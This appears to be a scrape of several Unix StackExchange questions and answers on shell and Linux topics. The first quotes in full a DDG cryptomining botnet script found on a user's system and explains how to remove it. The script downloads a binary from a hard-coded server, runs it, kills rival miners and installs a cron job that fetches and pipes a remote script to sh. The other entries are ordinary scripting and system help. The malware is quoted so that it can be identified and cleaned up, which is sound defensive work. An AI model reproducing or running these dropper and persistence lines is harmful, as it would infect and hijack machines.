touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable
export PATH=$PATH:$(pwd)

ps auxf | grep -v grep | grep xribfa4 || rm -rf xribfa4
if [ ! -f "xribfa4" ]; then
    curl -fsSL -m1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -o xribfa4||wget -q -T1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -O xribfa4
fi
chmod +x xribfa4
/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4

ps auxf | grep -v grep | grep xribbcb | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcc | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcd | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbce | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa0 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa1 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa2 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa3 | awk '{print $2}' | xargs kill -9

echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" | crontab -

My Linux knowledge is limited, but to me it seems that regularly downloading binaries from an Indonesian server and running them as root is not something that is usual. What is this? What should I do?
It is a DDG mining botnet. How it works:

- exploiting an RCE vulnerability
- modifying the crontab
- downloading the appropriate mining program (written in Go)
- starting the mining process

See:

- DDG: A Mining Botnet Aiming at Database Servers
- SystemdMiner: when a botnet borrows another botnet's infrastructure
- U&L: How can I kill minerd malware on an AWS EC2 instance? (compromised server)
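Based on the i.sh script quoted in the question, a minimal first-response sketch (all names are taken from that script; since arbitrary code ran as root, a full reinstall of the Pi is the only really safe fix):

# stop the miner and remove the dropped binaries
pkill -9 -f xribfa4
rm -f /usr/bin/xribfa4 /usr/libexec/xribfa4 /usr/local/bin/xribfa4 /tmp/xribfa4

# remove the cron entries it keeps re-creating
crontab -r -u root
rm -f /var/spool/cron/root /var/spool/cron/crontabs/root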
{ "score": 7, "source": [ "https://unix.stackexchange.com/questions/544811", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/141058/" ] }
544,861
Is this the correct way to start multiple sequential processings in the background?

for i in {1..10}; do
    for j in {1..10}; do
        run_command $i $j
    done &
done

All j should be processed after each other for a given i, but all i should be processed simultaneously.
The outer loop that you have is basically

for i in {1..10}; do
    some_compound_command &
done

This would start ten concurrent instances of some_compound_command in the background. They will be started as fast as possible, but not quite "all at the same time" (i.e. if some_compound_command takes very little time, then the first may well finish before the last one starts). The fact that some_compound_command happens to be a loop is not important. This means that the code that you show is correct in that iterations of the inner j-loop will be running sequentially, but all instances of the inner loop (one per iteration of the outer i-loop) would be started concurrently.

The only thing to keep in mind is that each background job will be running in a subshell. This means that changes made to the environment (e.g. modifications to values of shell variables, changes of current working directory with cd, etc.) in one instance of the inner loop will not be visible outside of that particular background job.

What you may want to add is a wait statement after your loop, just to wait for all background jobs to actually finish, at least before the script terminates:

for i in {1..10}; do
    for j in {1..10}; do
        run_command "$i" "$j"
    done &
done
wait
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/544861", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/341910/" ] }
544,887
What sed/awk command can I use to remove consecutive duplicate lines? Just sort -u would remove all instances.

Input:

abc
abc
def
abc
abc
def

Expected output:

abc
def
abc
def
That's what the uniq standard command is for. uniq your-file Note that some uniq implementations like GNU uniq will give you the first of a sequence of lines that sort the same (where strcoll() returns 0) as opposed to are byte-to-byte identical (where memcmp() or strcmp() returns 0). To force a byte to byte comparison regardless of the uniq implementation, you can force the locale to C with: LC_ALL=C uniq your-file
{ "score": 6, "source": [ "https://unix.stackexchange.com/questions/544887", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/365562/" ] }
545,034
Cloud IAP is a sort of proxy for Google Cloud Platform that lets you connect to compute instances that don't have public IP addresses, without a VPN. You stand up an instance and then you can use the gcloud utility to connect to it by name like so: gcloud compute ssh my-server-01 . This handles authenticating you through the proxy and logging you into the target server with your own Google account (using a feature called OS Login). I figure to make ansible do what the gcloud tool is doing I would need a custom connection plugin.
After discussion on https://www.reddit.com/r/ansible/comments/e9ve5q/ansible_slow_as_a_hell_with_gcp_iap_any_way_to/ I altered the solution to use SSH connection sharing via a socket. It is two times faster than @mat's solution. I put it on our PROD. Here is an implementation that doesn't depend on host name patterns! The proper solution is still to use a bastion/jump host, because the gcloud command spawns a Python interpreter that spawns ssh - it is still inefficient!

ansible.cfg:

[ssh_connection]
pipelining = True
ssh_executable = misc/gssh.sh
ssh_args =
transfer_method = piped

[privilege_escalation]
become = True
become_method = sudo

[defaults]
interpreter_python = /usr/bin/python
gathering = False
# Somehow important to enable parallel execution...
strategy = free

gssh.sh:

#!/bin/bash

# ansible/ansible/lib/ansible/plugins/connection/ssh.py
# exec_command(self, cmd, in_data=None, sudoable=True) calls _build_command(self, binary, *other_args) as:
#     args = (ssh_executable, self.host, cmd)
#     cmd = self._build_command(*args)
# So "host" is next to the last, and cmd is the last argument of the ssh command.
host="${@: -2: 1}"
cmd="${@: -1: 1}"

# ControlMaster=auto & ControlPath=... speed up Ansible execution 2 times.
socket="/tmp/ansible-ssh-${host}-22-iap"

gcloud_args="
--tunnel-through-iap
--zone=europe-west1-b
--quiet
--no-user-output-enabled
--
-C
-o ControlMaster=auto
-o ControlPersist=20
-o PreferredAuthentications=publickey
-o KbdInteractiveAuthentication=no
-o PasswordAuthentication=no
-o ConnectTimeout=20"

exec gcloud compute ssh "$host" $gcloud_args -o ControlPath="$socket" "$cmd"

UPDATE: There is a response from a Google engineer saying that gcloud isn't supposed to be called in parallel! See "gcloud compute ssh" can't be used in parallel. Experiments showed that with Ansible forks=5 I almost always hit an error; with forks=2 I never experienced one.

UPDATE 2: Time passed, and as of the end of 2020 I can run gcloud compute ssh in parallel (in WSL I used forks=10) without locking errors.
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/545034", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/314078/" ] }
545,039
I have a large file which looks like:

India 07 1800 BAHRAICH 42273 +28.4 +26.7 NA 997.1 1 NA NA
India 07 1800 BAHRAICH 42273 +28.4 +26.7 NA 997.1 NA NA NA
India 07 1800 BALASORE 42895 +29.0 +26.8 NA 999.7 NA NA NA
India 07 1800 BANGALORE 43295 +23.0 +17.4 908.1 geopotential_of_850mb_=_492 NA NA NA
India 07 1800 BANGALORE 43295 +23.0 +17.4 908.1 geopotential_of_850mb_=_492 Trace NA NA
India 07 1800 BAREILLY 42189 +28.4 +26.2 NA 997.4 NA NA NA
India 07 1800 BAREILLY 42189 +28.4 +26.2 NA 997.4 Trace NA NA
India 07 1800 BARMER 42435 +35.6 +22.6 NA 997.6 NA NA NA
India 07 1800 BHOPAL_BAIRAGHAR 42667 +23.6 +23.3 942.7 1000.5 13 NA NA
India 07 1800 BHOPAL_BAIRAGHAR 42667 +23.6 +23.3 942.7 1000.5 NA NA NA
India 07 1800 BHUBANESHWAR 42971 +28.0 +25.7 NA 1000.7 NA NA NA
India 07 1800 BHUJ-RUDRAMATA 42634 +29.6 +25.7 NA 999.5 NA NA NA
India 07 1800 BIKANER 42165 +33.8 +25.1 NA 994.0 NA NA NA
India 07 1800 BIKANER 42165 +33.8 +25.1 NA 994.0 NA NA NA
India 07 1800 BOMBAY_SANTACRUZ 43003 +29.0 +26.8 NA 1004.4 10 NA NA
India 07 1800 BOMBAY_SANTACRUZ 43003 +29.0 +26.8 NA 1004.4 NA NA NA

In this file, 2-3 lines at a time are the same except for one entry, which differs in the form of an "NA" that can occur at any position. I want to keep the line with the smaller number of "NA" entries. I am not able to think of a solution for this. I want the output as:

India 07 1800 BAHRAICH 42273 +28.4 +26.7 NA 997.1 1 NA NA
India 07 1800 BALASORE 42895 +29.0 +26.8 NA 999.7 NA NA NA
India 07 1800 BANGALORE 43295 +23.0 +17.4 908.1 geopotential_of_850mb_=_492 Trace NA NA
India 07 1800 BAREILLY 42189 +28.4 +26.2 NA 997.4 Trace NA NA
India 07 1800 BARMER 42435 +35.6 +22.6 NA 997.6 NA NA NA
India 07 1800 BHOPAL_BAIRAGHAR 42667 +23.6 +23.3 942.7 1000.5 13 NA NA
India 07 1800 BHUBANESHWAR 42971 +28.0 +25.7 NA 1000.7 NA NA NA
India 07 1800 BHUJ-RUDRAMATA 42634 +29.6 +25.7 NA 999.5 NA NA NA
India 07 1800 BIKANER 42165 +33.8 +25.1 NA 994.0 NA NA NA
India 07 1800 BOMBAY_SANTACRUZ 43003 +29.0 +26.8 NA 1004.4 10 NA NA

I will appreciate even just the logic to do so. Thanks.
Assuming the key is the 4th field and records with identical keys are consecutive (and I understood your question correctly), you could do something like:

perl -lane '
  $na = grep {$_ eq "NA"} @F;
  if ($F[3] eq $last_key) {
    if ($na < $min_na) { $min_na = $na; $min = $_ }
  } else {
    print $min unless $. == 1;
    $last_key = $F[3];
    $min = $_;
    $min_na = $na;
  }
  END { print $min if $. }' < your-file

This prints, among consecutive lines with the same 4th field, the first one with the least number of NA fields. If they're not consecutive, you could use some sorting:

< yourfile awk '{for (i=n=0;i<NF;i++) if ($i == "NA") n++; print n, $0}' |
  sort -k5,5 -k1,1n |
  sort -muk5,5 |
  cut -d ' ' -f 2-

With busybox sort, you'd want to add the -s option to the second invocation, as it seems to do some level of sorting of the input again despite the -m.
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/545039", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/68133/" ] }
545,051
I am using a tool to calculate the cyclomatic complexity of a JavaScript file. Example:

jsc --minimal test.js

This command gives the following output:

┌─────────────────────┬─────┬────────────┬─────────────────────┐
│ File                │ LOC │ Cyclomatic │ Halstead difficulty │
├─────────────────────┼─────┼────────────┼─────────────────────┤
│ /home/shray/test.js │ 23  │ 4          │ 10                  │
└─────────────────────┴─────┴────────────┴─────────────────────┘
Cyclomatic: min 4 mean 4.0 max 4
Halstead: min 10 mean 10.0 max 10

Now I use jsc --minimal test.js | grep "Cyclomatic:", which gives me the output:

Cyclomatic: min 4 mean 4.0 max 4

I have a regex, Cyclomatic:[\s]*min[\s]+([0-9]+), but I am not able to use it to extract the number showing the minimum cyclomatic value. Any help on how I can output just the min or max cyclomatic complexity value on the terminal?
If you know that this line is always of the same format, you can use a simple cut:

cut -d' ' -f3

or with awk you can do the whole thing, including your first grep:

awk '$1 == "Cyclomatic:" {print $3}'

If the line might change, use sed:

sed -E 's/.*( min )([0-9]+).*/\2/'

or grep -P if available:

grep -Po ' min \K[0-9]+'

or normal grep:

grep -o 'min [0-9]\+'

This returns min 4, which you can easily filter by adding another grep or cut:

grep -o '[0-9]\+$'
# or
cut -d' ' -f2
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/545051", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/316316/" ] }
545,097
I'm trying to come up with the sum of the lines in the .js files in a folder. I'm using this in bash:

sum=0 && find . | grep ".js" | while read -r f; do wc -l $f | awk '{print $1;}'; done;

Putting $sum += $1 inside the awk does not work. How am I supposed to do this? P.S.: I'm aware this can be achieved much more easily using find . -name '*.js' | xargs wc -l, but I still want the solution to the above.
Try this easy and super fast solution: find . -type f -name "*.js" -exec cat {} + | wc -l I tried some solutions with wc before, but they will have issues with e.g. newline in file names and/or are slow.
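To answer the "I still want the solution to above" part: the original loop loses $sum because a pipeline runs the while in a subshell. A sketch that keeps the total in the parent shell via process substitution (bash-specific; still assumes no newlines in file names):

sum=0
while IFS= read -r f; do
    n=$(wc -l < "$f")
    sum=$(( sum + n ))
done < <(find . -type f -name '*.js')
echo "$sum"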
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/545097", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/350921/" ] }
545,149
I am currently using sed to write to an Apache configuration file from stdin. I am using sed in this script to get around the limitation that the calling user does not have privileges to write to the file, so I can't simply echo "..." >> outputfile.conf. Here is what I have for writing to the file:

echo "<VirtualHost *:80>
...
</VirtualHost>" | sudo sed -n "w/etc/apache2/sites-available/000-default.conf"

How can I later append to this same file?

if $enable_ssl; then
    echo "<VirtualHost *:443>
    ...
    </VirtualHost>" | sudo sed <options-to-sed-here>
fi
The usual replacement for shell > with higher/different privileges is: echo "replace file content with this line" | sudo tee protectedFile >/dev/null And if you want to append, use -a : echo "append this line to file" | sudo tee -a protectedFile >/dev/null
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/545149", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/-1/" ] }
545,244
In POSIX, processes are “related” to each other through two basic hierarchies: The hierarchy of parent and child processes. The hierarchy of sessions and process groups. User processes have a great deal of control over the latter, via setpgid and setsid , but they have very little control over the former—the parent process ID is set when a process is spawned and altered by the kernel when the parent exits (usually to PID 1), but otherwise it does not change. Reflecting on that, I’ve been wondering how important the parent–child relationship really is. Here’s a summary of my understanding so far: Parent–child relationships are clearly important from the perspective of the parent process, since various syscalls, like wait and setpgid , are only allowed on child processes. The session–group–process relationship is clearly important to all processes, both the session leader and other processes in the session, since syscalls like kill operate on entire process groups, setpgid can only be used to join a group in the same session, and all processes in a session’s foreground process group are sent SIGHUP if the session leader exits. What’s more, the two hierarchies are clearly related from the perspective of the parent, since setsid only affects new children and setpgid can only be used on children, but they seem essentially unrelated from the perspective of the child (since a parent process dying has no impact whatsoever on a process’s group or session). Conspicuously absent, however, is any reason for a child process to care what its current parent is. Therefore, I have the following question: does the current value of getppid() have any importance whatsoever from the perspective of the child process , besides perhaps identifying whether or not its spawning process has exited? To put the same question another way, imagine the same program is spawned twice, from the same parent, in two different ways: The first child is spawned in the usual way, by fork() followed shortly by exec() . The second child is spawned indirectly: the parent process calls fork() , and then the child also calls fork() , and it’s the grandchild process that calls exec() . The immediate child then exits, so the grandchild is orphaned, and its PPID is reassigned to PID 1. In this hypothetical scenario, assuming all else is equal, do any reasonable programs have any reason to behave any differently? So far, my conclusion seems to be “no,” since the session is left unchanged, as are the process’s inherited file descriptors… but I’m not sure. Note: I do not consider “acquiring the parent PID to communicate with it” to be a valid answer to that question, since orphaned programs cannot in general rely on their PPID to be set to 1 (some systems set orphaned processes’ PPID to some other value), so the only way to avoid a race condition is to acquire the parent process ID via a call to getpid() before forking, then to use that value in the child.
When I saw this question, I was pretty interested because I know I've seen getppid used before..but I couldn't remember where. So, I turned to one of the projects that I figured has probably used every Linux syscall and then some: systemd . One GitHub search later, and I found two uses that portray some more general use cases (there are a few other uses as well, but they're more specific to systemd): In sd-notify . For some context: systemd needs to know when a service has started so it can proceed to start any that depend on it. This is normally done from a C program via the sd_notify API , which is a way for daemons to tell systemd their status. Of course, if you're using a shell script as a service...calling C functions isn't exactly doable. Therefore, systemd comes with the systemd-notify command , which is a small wrapper over the sd_notify API. One problem: systemd also needs to know the PID that is sending the message. For systemd-notify, this would be its own PID, which would be a short-lived process ID that immediately goes away. Not useful. You probably already know where I'm headed: getppid is used by systemd-notify to grab the parent process's PID, since that's usually the actual service process. In short, getppid can be used by a short-lived CLI application to send a message on behalf of the parent process. Once I found this, another unix tool that might use getppid like this came to mind: polkit, which is a process authentication framework used to gate stuff like sending D-Bus messages or running privileged applications. (At minimum, I'd guess you've seen the GUI password prompts that are displayed by polkit's auth agents.) polkit includes an executable named pkexec that can be used a bit like sudo, except now polkit is used for authorization. Now, polkit needs to know the PID of the process asking for authorization...yeah you get the idea, pkexec uses getppid to find that . (While looking at that, I also found out that polkit's TTY auth agent uses it too .) This one's a bit less interesting but still notable: getppid is used to emulate PR_SET_PDEATHSIG if the parent had died by the time that flag was set. (The flag is just a way for a child to be automatically sent a signal like SIGKILL if the parent dies.)
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/545244", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/63459/" ] }
545,272
Ok, so this has started to happen today for no real reason. I wanted to boot up my Kali build when it got stuck on "[ OK ] Started GNOME Display Manager" Weird thing is, the mouse appears. Like if I was in the actual login screen.I can move the mouse, type, I've even tried to login. I feel like the OS did start, it's just that the screen doesn't change (oh and yes, recovery mode works. I might try to start another version or try to see the logs).
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/545272", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/375778/" ] }
545,274
I'm currently learning about the Linux Kernel and OSes in general, and while I have found many great resources concerning IRQs, Drivers, Scheduling and other important OS concepts, as well as keyboard-related resources, I am having a difficult time putting together a comprehensive overview of how the Linux Kernel handles a button press on a keyboard. I'm not trying to understand every single detail at this stage, but am rather trying to connect concepts, somewhat comprehensively. I have the following scenario in mind: I'm on an x64 machine with a single processor. There're a couple of processes running, notably the Editor VIM ( Process #1 ) and say LibreOffice ( Process #2 ). I'm inside VIM and press the a -key. However, the process that's currently running is Process #2 (with VIM being scheduled next). This is how I imagine things to go down right now: The keyboard, through a series of steps, generates an electrical signal (USB Protocol Encoding) that it sends down the USB wire. The signal gets processed by a USB-Controller, and is sent through PCI-e (and possibly other controllers / buses?) to the Interrupt Controller ( APIC ). The APIC triggers the INT Pin of the processor. The processor switches to Kernel Mode and requests an IRQ-Number from the APIC , which it uses as an offset into the Interrupt Descriptor Table Register ( IDTR ). A descriptor is obtained, which is then used to obtain the address of the interrupt handler routine. As I understand it, this interrupt handler was initially registered by the keyboard driver? The interrupt handler routine (in this case a keyboard handler routine) is invoked. This brings me to my main question: By which mechanism does the interrupt handler routine communicate the pressed key to the correct Process ( Process #1 )? Does it actually do that, or does it simply write the pressed key into a buffer (available through a char-device ?), that is read-only to one process at a time (and currently "attached" to Process #1 )? I don't understand at which time Process #1 receives the key. Does it process the data immediately, as the interrupt handler schedules the process immediately, or does it process the key data the next time that the scheduler schedules it? When this handler returns ( IRET ), the context is switched back to the previously executing process ( Process #2 ).
Your understanding so far is correct, but you miss most of the complexity that's built on that. The processing in the kernel happens in several layers, and the keypress "bubbles up" through the layers. The USB communication protocol itself is a lot more involved. The interrupt handler routine for USB handles this, and assembles a complete USB packet from multiple fragments, if necessary. The key press uses the so-called HID ("Human interface device") protocol, which is built on top of USB. So the lower USB kernel layer detects that the complete message is a USB HID event, and passes it to the HID layer in the kernel. The HID layer interprets this event according to the HID descriptor it has requested from the device on initialization. It then passes the events to the input layer. A single HID event can generate multiple key press events. The input layer uses kernel keyboard layout tables to map the scan code (position of the key on the keyboard) to a key code (like A ) and interprets Shift , Alt , etc. The result of this interpretation is made available via /dev/input/event* to userland processes. You can use evtest to watch those events in real-time. But processing is not finished here. The X Server (responsible for graphics) has a generic evdev driver that reads events from /dev/input/event* devices, and then maps them again according to a second set of keyboard layout tables (you can see those partly with xmodmap and fully via the XKBD extension). This is because the X server predates the kernel input layer, and in earlier times had drivers to handle mouse and PS/2 keys directly. Then the X server sends a message to the X client (application) containing the keyboard event. You can see those messages with the xev application. LibreOffice will process this event directly, VIM will be running in an xterm which will process the event, and (you guessed it) again add some extra processing to it, and finally pass it to VIM via stdin . Complicated enough?
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/545274", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/343395/" ] }
545,318
How can I tell the following rsync command to copy only the files directly in the source directory, i.e. to not copy sub-directories from the source directory?
rsync -avi --delete --modify-window=1 --no-perms --no-o --no-g ~/Documents/Stuff/ /media/user/PC/Stuff
You can add option --exclude='*/' to your rsync options to prevent syncing of directories.
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/545318", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/186571/" ] }
545,380
I'd like to pass the result of mktemp as an argument to a command, let's say gcc -o . gcc -o $(mktemp) causes the result to be used, but I need to figure out what the result was. The only thing I could come up with is gcc -o $(out=$(mktemp); echo $out) , but that doesn't print the value to the console; instead it's used as the argument value, which is correct afaik. Is there any way to get the result of mktemp printed to the console? I'm able to solve this in a script, but I'd like to broaden my knowledge with the one-liner solution you hopefully propose. I'd like to use this in bash on Ubuntu 19.04.
How about tee with /dev/tty ?
$ gcc -o $(mktemp | tee /dev/tty) hello.c
/tmp/tmp.UBSSnulNn2
$ /tmp/tmp.UBSSnulNn2
Hello, world!
Related: using tee to output intermediate results to stdout instead of files
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/545380", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/63502/" ] }
545,462
I would assume ' inet ' stands for internet ip address, but is that correct? (And ' inet6 ' being internet ip address v.6.) ip a yields a list of virtual (and physical?) network devices. When an IP address is mapped to a device, it is displayed as
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
According to https://acronyms.thefreedictionary.com/INET , the following definitions are possible:
INET - Internet
INET - Intranet
INET - International Networking
INET - Information Network
INET - Institute for New Economic Thinking (est. 2009)
INET - International Networking (conference)
INET - Institutional Network (Hawaii Department of Education)
INET - Instruments and Experimental Techniques (journal)
INET - Interagency Narcotics Enforcement Team
INET - Instinet LLC
INET - Integrated Network Enhanced Telemetry
INET - Instructional Network
inet = Internet protocol family inet6 = Internet protocol version 6 family manpage inet DESCRIPTION The Internet protocol family is a collection of protocols layered atop the Internet Protocol (IP) transport layer, and utilizing the Internet address format. The Internet family provides protocol support for the SOCK_STREAM, SOCK_DGRAM, and SOCK_RAW socket types; the SOCK_RAW interface provides access to the IP protocol. manpage inet6 DESCRIPTION The inet6 family is an updated version of inet(4) family. While inet(4) implements Internet Protocol version 4, inet6 implements Internet Protocol version 6. inet6 is a collection of protocols layered atop the Internet Protocol version 6 (IPv6) transport layer, and utilizing the IPv6 address format. The inet6 family provides protocol support for the SOCK_STREAM, SOCK_DGRAM, and SOCK_RAW socket types; the SOCK_RAW interface provides access to the IPv6 protocol.
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/545462", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/33386/" ] }
545,502
Trying to write some nested loop, and I'm not getting how to write it. Perhaps I'm looking in a wrong direction but what I'm trying to write is:
declare -a bar=("alpha" "bravo" "charlie")
declare -a foo=("delta" "echo" "foxtrot" "golf")
declare -a subgroups=("bar" "foo")
So then I would like to iterate the subgroups (in the future more bar s and foo s will come), and inside them iterate them as they can have a different number of elements. The desired output would be something like:
group name: bar with group members: alpha bravo charlie
    working on alpha of the bar group
    working on bravo of the bar group
    working on charlie of the bar group
group name: foo with group members: delta echo foxtrot golf
    working on delta of the foo group
    working on echo of the foo group
    working on foxtrot of the foo group
    working on golf of the foo group
The closest code I've written seems to fail in the bar and foo arrays and their expansion with the elements on each set:
for group in "${subgroups[@]}"; do
    lst=${!group}
    echo "group name: ${group} with group members: ${!lst[@]}"
    for element in "${!lst[@]}"; do
        echo -en "\tworking on $element of the $group group\n"
    done
done
And the output is:
group name: bar with group members: 0
    working on 0 of the bar group
group name: foo with group members: 0
    working on 0 of the foo group
This is a pretty common problem in bash , to reference array within arrays for which you need to create name-references with declare -n . The name following the -n will act as a nameref to the value assigned (after = ). Now we treat this variable with nameref attribute to expand as if it were an array and do a full proper quoted array expansion as before.
for group in "${subgroups[@]}"; do
    declare -n lst="$group"
    echo "group name: ${group} with group members: ${lst[@]}"
    for element in "${lst[@]}"; do
        echo -en "\tworking on $element of the $group group\n"
    done
done
Note that bash supports nameref's from v4.3 onwards only. For older versions and other workarounds see Assigning indirect/reference variables
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/545502", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/64405/" ] }
545,508
I'm currently trying to set up an SSH server so that access to it from outside the network is ONLY allowed using an SSH Key and does not allow access to root or by any other username/password combination. At the same time, internal users inside the network still need to be able to connect to the same system, but expect to log in in the more traditional sense with a user name and password. Users both external & internal will be accessing the system from windows using PuttySSH and the external access will be coming into the system via a port forwarding firewall that will open the source port to the outside world on some arbitrarily chosen high numbered port like 55000 (or whatever the admins decide). The following diagram attempts to show the traffic flows better. I know how to set up the actual login to only use keys, and I know how to deny root; what I don't know is how to separate the two login types. I had considered running two copies of SSHD listening on different ports on the same IP and having two different configurations for each port. I also considered setting up a "match" rule, but I'm not sure if I can segregate server wide configurations using those options. Finally, the external person logging in will always be the same user, let's call them "Frank" for the purposes of this question, so "Frank" will only ever be allowed to log in from the external IP, and never actually be sat in front of any system connecting internally, whereas every other user of the system will only ever connect internally, and never connect from an external IP. Frank's IP that he connects from is a dynamically assigned one but the public IP he is connecting to is static and will never change, the internal IP of the port forwarder likewise will also never change and neither will the internal IP address of the SSH server. Internal clients will always connect from an IP in the private network range that the internal SSH server's IP is part of, which is a 16 bit mask EG: 192.168.0.0/16 Is this set up possible, using one config file and one SSH server instance? If so, how do I do it? Or am I better off using 2 running servers with different configs? For ref the SSH server is running on Ubuntu 18.04.
So, it turns out the answer was actually way, way simpler than I thought it would be. I do however have to thank '@jeff schaller' for his comments; if it hadn't been for him I wouldn't have started looking into how the SSH 'Match' configuration works. Anyway, the trick is to set your /etc/ssh/sshd_config file up so that the default is the configuration you would like to have for the access coming in from the external internet connection. In my case, this meant setting the following:
PermitRootLogin no
PasswordAuthentication no
UsePAM no
By doing this, I'm forcing ALL logins, no matter where they come from, to be key based logins using an SSH key. I then on the windows machines used 'PuttyGen' to generate a public/private key pair which I saved to disk, and an appropriate ssh entry for the "authorized_keys" file in the external user's home directory. I pasted this ssh key into the correct place in my user's home folder, then set putty up to use the private (ppk) file generated by PuttyGen for login and saved the profile. I then sent the profile and the ppk key file to the external user using a secure method (encrypted email with a password protected zip file attached). Once the user had the ppk and profile in their copy of putty and could log in, I then added the following as the last 2 lines of my sshd_config file:
Match Host server1,server1.internalnet.local,1.2.3.4
    PasswordAuthentication yes
In the "Match" line I've changed the server names to protect the names of my own servers. Note each server domain is separated by a comma and NO SPACES, this is important. If you put any spaces in, it causes SSHD to not load the config and report an error. The 3 matches I have in there do the following:
server1 - matches on anyone using just 'server1' with no domain to connect EG: 'fred@server1'
server1.internalnet.local - matches on anyone using the fully qualified internal domain name EG: '[email protected]' (NOTE: you will need an internal DNS to make this work correctly)
1.2.3.4 - matches on the specific I.P. address assigned to the SSH server EG: '[email protected]' This can use wild cards, or even better net/mask cidr format EG: 1.2.* or 192.168.1.0/8 If you do use wild cards however, please read fchurca's answer below for some important notes.
If any of the patterns provided match the host being accessed, then the one and only change made to the running config is to turn back on the ability to have an interactive password login. You can also put other config directives in here too, and those directives will also be turned back on for internal hosts listed in the match list. Do however read this: https://man.openbsd.org/OpenBSD-current/man5/ssh_config.5 carefully, as not every configuration option is allowed to be used inside a match block; I found this out when I tried "UsePAM yes" to turn PAM authentication back on, only to be told squarely that wasn't allowed. Once you've made your changes, type sshd -T followed by return to test them before attempting to restart the server; it'll report any errors you have. In addition to everything above, I got a lot of help from the following two links too: https://raymii.org/s/tutorials/Limit_access_to_openssh_features_with_the_Match_keyword.html https://www.cyberciti.biz/faq/match-address-sshd_config-allow-root-loginfrom-one_ip_address-on-linux-unix/
{ "score": 6, "source": [ "https://unix.stackexchange.com/questions/545508", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/72591/" ] }
545,640
Nowadays within the programming community, console mostly refers to a text-based environment, either software (shells, terminals, cli) only or hardware included. But why is it so called?
There’s a similar question on Retrocomputing . The earliest computers were controlled using cables, switches and buttons on panels on the computer itself, and provided output using lights. Eventually the control devices were “extracted” from the computer into a separate device; for example the IBM 704’s operator console, which still used switches and lights but was a separate cabinet (see the IBM 704 operating manual , pages 13 and 14). Later on this became a separate piece of furniture based on a desk, with a keyboard and some form of output device (a printer or a screen). This is reminiscent of an organ console which can be separated from the instrument itself. On early multi-user computers, the console often had a special role: it was typically the only active terminal during early boot, and on some systems, logging in on the console granted more privileges than any other terminal. On most early systems the console was a text-only terminal, and that limitation has been associated with the term ever since. On PCs running Unix-like systems, the console generally used the built-in text-mode support, which probably helped preserve that association; but even on graphical workstations, emergency logins were typically text-only (albeit on a graphical framebuffer).
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/545640", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/77068/" ] }
545,691
On Ubuntu 18.04, I have the following behavior of date :
$ date --version | head -n1
date (GNU coreutils) 8.28
$ date
Вт окт 8 13:18:18 MSK 2019
$ TZ=UTC date
Вт окт 8 10:18:23 UTC 2019
So far so good. But now I'm trying to do the same on Raspbian 9:
$ date --version | head -n1
date (GNU coreutils) 8.26
$ date
Tue Oct 8 13:18:50 MSK 2019
$ TZ=UTC date
Tue Oct 8 13:18:51 MSK 2019
What could be the reason for the Raspbian version of date to ignore the TZ environment variable?
I can think of two possible causes: the file /usr/share/zoneinfo/UTC is not present or is corrupted on your Raspbian 9, so glibc fails to implement the TZ variable setting and falls back to system default timezone, you may have a previously-configured TZ variable that has been marked as read-only, so your attempt to change it won't take effect.
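A quick way to check both hypotheses from the affected shell: the first command verifies the tzfile exists and is readable, the second (bash syntax) shows whether TZ has been marked read-only:
$ ls -l /usr/share/zoneinfo/UTC
$ readonly -p | grep TZ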
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/545691", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/27672/" ] }
545,699
